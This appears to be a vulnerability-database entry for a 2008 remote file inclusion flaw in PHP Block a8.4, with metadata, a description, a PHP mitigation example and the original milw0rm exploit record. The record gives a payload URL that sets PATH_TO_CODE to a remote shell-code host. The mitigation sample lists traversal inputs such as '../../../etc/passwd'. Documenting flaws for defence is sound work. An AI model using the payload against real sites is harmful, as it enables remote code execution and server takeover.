Vendor: PHP Block a8.4
By: milw0rm.com
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: PHP Block a8.4
Affected Version From: a8.4
Affected Version To: a8.4
Patch Exists: No
Related CWE: N/A
CPE: a:phpblock:php_block_a8.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Block a8.4

PHP Block a8.4 is vulnerable to Remote File Inclusion. The vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it as if it were a local file. It exists because the application does not properly sanitize user input supplied through the PATH_TO_CODE parameter. An attacker can exploit it by crafting a malicious URL and sending it to an unsuspecting user.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
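
One way to apply this mitigation to an include like the one quoted in the raw data, as an added example (not PHP Block's own code or a vendor patch): the include base is fixed on the server and only a relative path that resolves inside it is accepted. It goes slightly beyond the reported case by also rejecting directory traversal; `safe_include_path()`, the temporary directory and the sample inputs are constructed for illustration.

```php
<?php
// Added example; safe_include_path() is a hypothetical helper.
// Reported pattern: include_once $PATH_TO_CODE."/script/fonction.php";
// where $PATH_TO_CODE can be set from the query string.
// Defence in depth: keep allow_url_include = Off in php.ini.

/** Return the resolved path if $relative stays inside $root, else null. */
function safe_include_path(string $root, string $relative): ?string
{
    // Reject anything that starts with a scheme (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($full === false) {
        return null; // target does not exist
    }
    // Containment check on the canonical path (defeats ../ sequences).
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed sandbox standing in for the application directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phpblock_demo_' . getmypid();
mkdir($root . '/script', 0700, true);
file_put_contents($root . '/script/fonction.php', "<?php // stub\n");
$root = realpath($root); // server-side constant, never taken from the request

// Constructed inputs: the legitimate file, a URL, and two traversal attempts.
$samples = [
    'script/fonction.php',
    'http://example.invalid/script/fonction.php',
    '../../../etc/passwd',
    'script/../../outside.php',
];
foreach ($samples as $s) {
    $resolved = safe_include_path($root, $s);
    printf("%-45s %s\n", $s, $resolved === null ? 'REJECTED' : 'ok');
    if ($resolved !== null) {
        include_once $resolved; // only reached for files inside $root
    }
}

// Remove the sandbox.
unlink($root . '/script/fonction.php');
rmdir($root . '/script');
rmdir($root);
```
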
Source

Exploit-DB raw data:

Script Name : PHP Block a8.4
 
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
 
Error : include_once $PATH_TO_CODE."/script/fonction.php";
 
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
 
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]